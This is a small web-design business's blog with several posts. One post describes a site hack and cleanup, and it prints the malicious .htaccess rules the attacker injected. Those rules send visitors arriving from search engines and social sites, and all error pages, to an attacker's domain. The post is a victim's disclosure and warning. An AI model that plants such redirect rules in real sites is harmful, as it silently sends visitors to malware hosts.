Andrea Barnett - a&b WebDesign
It took a bit, but I think I’m finally malware free again. I had fixed everything at one point, and only a few hours later, the worm had gotten back in. My hosting account allows me to host multiple domains in one account, which is a great deal and money-saver. However, one of those domains, the one belonging to my personal blog, had an outdated and neglected version of zenphoto with security flaws attached, and that’s how these scumbags got in. I expect that newer versions of zenphoto no longer have this weakness, and this was totally my fault for not making proper updates – they are published for a reason!!
And once thew were in, they could easily move from one domain hosted there to the next, and soil them all. I deleted the entire zenphoto installation, wasn’t using it any more anyway, re-installed all the affected/ infected files and folders, and signed up with SiteLock which now monitors this website daily and helps assure that my site and all its visitors are safe.
I also know that I’m not the only one that was attacked by these low-lives. A Google search for hacked by turnitupnow.net brings up over 1.3 million hits.
To the "Experts" behind this scheme:
When people talk about SEO (Search Engine Optimization) and building backlinks, etc. what you did is NOT what they have in mind. You would be better of spending your ‘talents’ and energies on finishing this half-cocked website of yours that you have out there in public. Most the internal links still have no content. Hitting the ‘Contact” link as well as the “Post” link on top of your pages just reveals XML Parsing Errors, and looking at the low numbers displayed next to all the Tweet and FB-Share buttons, it’s obvious that your hacking-strategy did not work.
I, on the other hand, now have a better site and have learned new things because of this.
Thank you for that.
Andrea Barnett - a&b WebDesign
a&b WebDesign has been hacked and Malware was inserted into the site. I am not sure how it happened, but what a mess!!!! I had to delete everything and start over with a whole new installation. That’s when one gets to appreciate the real value of a good backup. Mine could have been better, but I had enough to recreate everything, and I’ve learned some valuable new lessons.
However, I don’t take kindly to this kind of act. There’s not much I can do about it, but post whatever information I have gained and hope it will help someone else. The first attack was on my .htaccess files, where I found this: (I am only posting an image of the stuff. I do not know what this code does, and do not want to unleash their evil accidentally):
I still have no idea what that all means, but it was easy enough to delete. But only the next day, I found this in the same .htaccess file:
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|
goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog
|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr)\.(.*)
RewriteRule ^(.*)$ http://piramiddynamyc.in/sapog/index.php [R=301,L]
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
ErrorDocument 400 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 401 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 403 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 404 http://piramiddynamyc.in/sapog/index.php
ErrorDocument 500 http://piramiddynamyc.in/sapog/index.php
I don’t know who you are, piramiddynamyc.in, but you are not and will never be my friend. And whoever reads this, don’t go there. I tried, just to see the enemy’s camp, and FireFox warned me that this was an attack site, so I didn’t enter.
Unfortunately, it didn’t stop here – just when I thought my house was clean again, all my .php files got attached. Now talk about a huge mess – there are loads of those inside a WordPress site. This time, I found the code shown in this image. Clearly, I had been attacked by www.turnitupnow.net – or on behalf of them.
I don’t know what kind of a crap organization turnitupnow.net is, that they resort to this kind of ‘advertising’. I suspect that all three attacks were done by the same person(s), and I sincerely hope someone out there knows enough to shut them down once and for all. I have wasted the last week of my life cleaning up their mess, and I’m still not completely done.
but you know, I’ve learned a lot …
Andrea Barnett - a&b WebDesign
Actually, it is never finished. A website is a living organism. There is always something to add or replace, a new feature to implement, or something else to try to make things even better. But the basic redesign of the a&b WebDesign site and its transformation to a Content Management System has been completed.
a&b Webdesign not only received a new design, we have also changed web hosts and had to move all the pages to the new host. Those moves often prove to be more challenging than expected, but in the end, everything fell into place.
Going forward, I will continue to explore the many options that WordPress offers and watch the site evolve.
Andrea Barnett - a&b WebDesign
The plan was to finish the formatting this weekend, but unfortunately, my host had problems and the server that houses my site was down all day Saturday. That’s a whole day wasted, and now I’m playing catch-up. There are only a few things left that need to be set up in the new template, and then a fine-tuning of the exact colors, some of the spacing, and other assorted what-nots.